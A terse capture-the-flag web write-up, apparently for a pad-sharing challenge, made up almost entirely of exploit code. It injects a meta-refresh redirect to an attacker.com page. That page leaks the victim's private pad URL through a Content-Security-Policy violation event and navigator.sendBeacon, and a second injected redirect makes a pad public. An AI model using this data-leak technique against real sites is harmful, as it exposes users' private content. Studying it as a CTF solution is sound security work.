Tags: web
Rating: 5.0
tl;dr
First pad
<!-- redirect to attacker site -->
<meta http-equiv="refresh" content="1; url=https://attacker.com/attacker.html">
https://attacker.com/attacker.html
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Security-Policy" content="frame-src 'self' xn--pd-viaaa.space;">
<title>TEST</title>
</head>
<body>
<script>
document.addEventListener('securitypolicyviolation', async function (event) {
console.log(event)
navigator.sendBeacon(location.href,event.blockedURI)
});
</script>
<iframe src="https://päääd.space/p/latest"></iframe>
</body>
</html>
Second pad
<!-- to make pad public-->
<meta http-equiv="refresh" content="1; url=unique_id.xn--pd-viaaa.space?edit=isPublic">